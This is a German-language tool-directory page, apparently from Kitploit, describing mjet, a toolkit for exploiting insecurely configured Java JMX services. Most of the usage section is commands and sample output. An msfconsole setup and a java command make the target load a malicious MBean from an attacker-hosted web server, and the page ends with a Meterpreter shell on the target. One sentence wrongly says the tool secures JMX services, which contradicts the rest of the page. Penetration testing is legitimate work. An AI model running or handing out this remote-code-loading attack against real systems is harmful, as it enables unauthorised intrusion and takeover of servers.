Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
mjet — Mogwai Java Management Extensions (JMX) Exploitation-Toolkit | Kitploit
Tools/GitHubGitHub/mogwaisec/mjet
Exploit-FrameworksPayload-GenerierungExploitationPenetrationstestsFehlkonfigurationRed Teaming
GitHubmogwaisec/mjet

mjet

Mogwai Java Management Extensions (JMX) Exploitation-Toolkit

Repository anzeigen
174315vor 10 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

mjet

Mogwai Security Java Management Extensions (JMX) Exploitation-Toolkit

mjet ist ein Werkzeug, das verwendet werden kann, um unsicher konfigurierte JMX-Dienste abzusichern. Es basiert auf dem Blog-Beitrag "Exploiting JMX-RMI" von Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" und kann verwendet werden, um beliebige Metasploit-Payloads auf dem Zielsystem auszuführen.

Mjet war ursprünglich als vollständiges Angriffs-Toolkit geplant, jedoch haben wir festgestellt, dass das Metasploit-Github-Repository einen Pull-Request enthält, der grundlegende Java-RMI/Serialisierungs-Unterstützung in nativem Ruby bereitstellen wird. Das ist großartig und entfernt die Java-Abhängigkeit. Also haben wir die Entwicklung dieses Tools eingestellt und werden in naher Zukunft Metasploit-Module erstellen.

mjet besteht aus den folgenden Teilen:

  • Ein Metasploit-Modul, das einen "mlet Server" emuliert. Dies ist im Grunde ein Webserver, der eine HTML-Datei hostet, die ein mlet-Tag enthält.
  • Ein ManagedBean, das vom mlet-Server-Modul geändert wird, um den ausgewählten Payload einzubinden.
  • Ein JAR-Archiv, das verwendet wird, um den unsicheren JMX-Dienst zu kontaktieren.

Installation (mit der Github-Version von Metasploit)

  • Kopieren Sie den Ordner "MBean" nach "data/java/metasploit".
  • Kopieren Sie java_mlet_server.rb nach "modules/exploits/multi/misc/".

Verwendung

Das Beispiel verwendet die folgenden Systeme: Angreifer: 192.168.178.1 Ziel: 192.168.178.200, JMX-Dienst läuft auf TCP-Port 1616

  • Konfigurieren/starten Sie das Metasploit-Modul "java_mlet_server". Das Modul wird als Hintergrundjob ausgeführt.
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
Tool herunterladen

Verwenden Sie mjet.jar, um sich mit dem verwundbaren JMX-Dienst zu verbinden, und geben Sie die URL des MLet-Webservers an...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

und genießen Sie Ihre Meterpreter-Shell :-)